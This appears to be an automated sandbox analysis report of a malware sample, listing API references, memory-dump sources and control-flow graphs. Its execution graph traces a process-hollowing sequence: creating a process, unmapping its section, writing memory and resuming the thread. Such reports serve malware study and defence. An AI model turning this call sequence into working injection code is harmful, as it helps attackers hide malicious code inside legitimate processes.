                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 02223F51
                                  • Part of subcall function 02225BA8: __getptd_noexit.LIBCMT ref: 02225BA8
                                • __gmtime64_s.LIBCMT ref: 02223FEA
                                • __gmtime64_s.LIBCMT ref: 02224020
                                • __gmtime64_s.LIBCMT ref: 0222403D
                                • __allrem.LIBCMT ref: 02224093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022240AF
                                • __allrem.LIBCMT ref: 022240C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022240E4
                                • __allrem.LIBCMT ref: 022240FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02224119
                                • __invoke_watson.LIBCMT ref: 0222418A
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                APIs
                                • __getptd_noexit.LIBCMT ref: 022C66DD
                                  • Part of subcall function 022259BF: __calloc_crt.LIBCMT ref: 022259E2
                                  • Part of subcall function 022259BF: __initptd.LIBCMT ref: 02225A04
                                • __calloc_crt.LIBCMT ref: 022C6700
                                • __get_sys_err_msg.LIBCMT ref: 022C671E
                                • __invoke_watson.LIBCMT ref: 022C673B
                                • __get_sys_err_msg.LIBCMT ref: 022C676D
                                • __invoke_watson.LIBCMT ref: 022C678B
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _memset
                                • String ID: D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _memset
                                • String ID: $$$(
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _wcsnlen
                                • String ID: U
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _memset
                                • String ID: p2Q
                                APIs
                                • std::exception::exception.LIBCMT ref: 0224FBF1
                                  • Part of subcall function 0223169C: std::exception::_Copy_str.LIBCMT ref: 022316B5
                                • __CxxThrowException@8.LIBCMT ref: 0224FC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                APIs
                                  • Part of subcall function 0222197D: __wfsopen.LIBCMT ref: 02221988
                                • _fgetws.LIBCMT ref: 0220D15C
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 022C7A4B
                                  • Part of subcall function 022C8140: ___BuildCatchObjectHelper.LIBCMT ref: 022C8172
                                  • Part of subcall function 022C8140: ___AdjustPointer.LIBCMT ref: 022C8189
                                • _UnwindNestedFrames.LIBCMT ref: 022C7A62
                                • ___FrameUnwindToState.LIBCMT ref: 022C7A74
                                • CallCatchBlock.LIBCMT ref: 022C7A98
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:

                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:38
                                Total number of Limit Nodes:8
                                execution_graph 33580 22b0000 33583 22b0630 33580->33583 33582 22b0005 33584 22b064c 33583->33584 33586 22b1577 33584->33586 33589 22b05b0 33586->33589 33592 22b05dc 33589->33592 33590 22b061e 33591 22b05e2 GetFileAttributesA 33591->33592 33592->33590 33592->33591 33594 22b0420 33592->33594 33595 22b04f3 33594->33595 33596 22b04fa 33595->33596 33597 22b04ff CreateWindowExA 33595->33597 33596->33592 33597->33596 33598 22b0540 PostMessageA 33597->33598 33599 22b055f 33598->33599 33599->33596 33601 22b0110 VirtualAlloc GetModuleFileNameA 33599->33601 33602 22b017d CreateProcessA 33601->33602 33603 22b0414 33601->33603 33602->33603 33605 22b025f VirtualFree VirtualAlloc Wow64GetThreadContext 33602->33605 33603->33599 33605->33603 33606 22b02a9 ReadProcessMemory 33605->33606 33607 22b02e5 VirtualAllocEx NtWriteVirtualMemory 33606->33607 33608 22b02d5 NtUnmapViewOfSection 33606->33608 33611 22b033b 33607->33611 33608->33607 33609 22b039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33612 22b03fb ExitProcess 33609->33612 33610 22b0350 NtWriteVirtualMemory 33610->33611 33611->33609 33611->33610 33614 2088026 33615 2088035 33614->33615 33618 20887c6 33615->33618 33624 20887e1 33618->33624 33619 20887ea CreateToolhelp32Snapshot 33620 2088806 Module32First 33619->33620 33619->33624 33621 208803e 33620->33621 33622 2088815 33620->33622 33625 2088485 33622->33625 33624->33619 33624->33620 33626 20884b0 33625->33626 33627 20884c1 VirtualAlloc 33626->33627 33628 20884f9 33626->33628 33627->33628

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 022B0156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 022B016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 022B0255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 022B0270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 022B0283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 022B029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022B02C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022B02E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 022B0304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 022B032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 022B0399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022B03BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022B03E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022B03ED
                                • ExitProcess.KERNEL32(00000000), ref: 022B0412
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:

                                Control-flow Graph

                                control_flow_graph 15 22b0420-22b04f8 17 22b04fa 15->17 18 22b04ff-22b053c CreateWindowExA 15->18 19 22b05aa-22b05ad 17->19 20 22b053e 18->20 21 22b0540-22b0558 PostMessageA 18->21 20->19 22 22b055f-22b0563 21->22 22->19 23 22b0565-22b0579 22->23 23->19 25 22b057b-22b0582 23->25 26 22b05a8 25->26 27 22b0584-22b0588 25->27 26->22 27->26 28 22b058a-22b0591 27->28 28->26 29 22b0593-22b0597 call 22b0110 28->29 31 22b059c-22b05a5 29->31 31->26
                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 022B0533
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin

                                Control-flow Graph

                                control_flow_graph 32 22b05b0-22b05d5 33 22b05dc-22b05e0 32->33 34 22b061e-22b0621 33->34 35 22b05e2-22b05f5 GetFileAttributesA 33->35 36 22b0613-22b061c 35->36 37 22b05f7-22b05fe 35->37 36->33 37->36 38 22b0600-22b060b call 22b0420 37->38 40 22b0610 38->40 40->36
                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022B05EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                • API ID: AttributesFile
                                • String ID: apfHQ$o

                                Control-flow Graph

                                control_flow_graph 41 20887c6-20887df 42 20887e1-20887e3 41->42 43 20887ea-20887f6 CreateToolhelp32Snapshot 42->43 44 20887e5 42->44 45 20887f8-20887fe 43->45 46 2088806-2088813 Module32First 43->46 44->43 45->46 51 2088800-2088804 45->51 47 208881c-2088824 46->47 48 2088815-2088816 call 2088485 46->48 52 208881b 48->52 51->42 51->46 52->47
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020887EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0208880E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Offset: 02088000, based on PE: false
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:

                                Control-flow Graph

                                control_flow_graph 66 2088485-20884bf call 2088798 69 208850d 66->69 70 20884c1-20884f4 VirtualAlloc call 2088512 66->70 69->69 72 20884f9-208850b 70->72 72->69
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020884D6
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, Offset: 02088000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2088000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:
                                • API String ID: 1442030790-0

                                Control-flow Graph

                                APIs
                                • std::exception::exception.LIBCMT ref: 022FFC1F
                                  • Part of subcall function 022E169C: std::exception::_Copy_str.LIBCMT ref: 022E16B5
                                • __CxxThrowException@8.LIBCMT ref: 022FFC34
                                • std::exception::exception.LIBCMT ref: 022FFC4D
                                • __CxxThrowException@8.LIBCMT ref: 022FFC62
                                • std::regex_error::regex_error.LIBCPMT ref: 022FFC74
                                  • Part of subcall function 022FF914: std::exception::exception.LIBCMT ref: 022FF92E
                                • __CxxThrowException@8.LIBCMT ref: 022FFC82
                                • std::exception::exception.LIBCMT ref: 022FFC9B
                                • __CxxThrowException@8.LIBCMT ref: 022FFCB0
                                Strings
                                • leM, xrefs: 022FFCA8
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 022FFCB6
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.
                                • API String ID: 3569886845-85255083

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 022D3F51
                                  • Part of subcall function 022D5BA8: __getptd_noexit.LIBCMT ref: 022D5BA8
                                • __gmtime64_s.LIBCMT ref: 022D3FEA
                                • __gmtime64_s.LIBCMT ref: 022D4020
                                • __gmtime64_s.LIBCMT ref: 022D403D
                                • __allrem.LIBCMT ref: 022D4093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D40AF
                                • __allrem.LIBCMT ref: 022D40C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D40E4
                                • __allrem.LIBCMT ref: 022D40FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D4119
                                • __invoke_watson.LIBCMT ref: 022D418A
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                • API String ID: 3432600739-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                • API String ID: 1022109855-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                • API String ID: 3721157643-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                • API String ID: 65388428-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 3534693527-0
                                APIs
                                • __getptd_noexit.LIBCMT ref: 023766DD
                                  • Part of subcall function 022D59BF: __calloc_crt.LIBCMT ref: 022D59E2
                                  • Part of subcall function 022D59BF: __initptd.LIBCMT ref: 022D5A04
                                • __calloc_crt.LIBCMT ref: 02376700
                                • __get_sys_err_msg.LIBCMT ref: 0237671E
                                • __invoke_watson.LIBCMT ref: 0237673B
                                • __get_sys_err_msg.LIBCMT ref: 0237676D
                                • __invoke_watson.LIBCMT ref: 0237678B
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                • API String ID: 4066021419-0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: D
                                • API String ID: 2102423945-2746444292
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: $$$(
                                • API String ID: 2102423945-3551151888
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                APIs
                                • std::exception::exception.LIBCMT ref: 022FFBF1
                                  • Part of subcall function 022E169C: std::exception::_Copy_str.LIBCMT ref: 022E16B5
                                • __CxxThrowException@8.LIBCMT ref: 022FFC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                • API String ID: 3662862379-3870166017
                                APIs
                                  • Part of subcall function 022D197D: __wfsopen.LIBCMT ref: 022D1988
                                • _fgetws.LIBCMT ref: 022BD15C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                • API String ID: 853134316-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                • API String ID: 1783060780-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 02377A4B
                                  • Part of subcall function 02378140: ___BuildCatchObjectHelper.LIBCMT ref: 02378172
                                  • Part of subcall function 02378140: ___AdjustPointer.LIBCMT ref: 02378189
                                • _UnwindNestedFrames.LIBCMT ref: 02377A62
                                • ___FrameUnwindToState.LIBCMT ref: 02377A74
                                • CallCatchBlock.LIBCMT ref: 02377A98
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0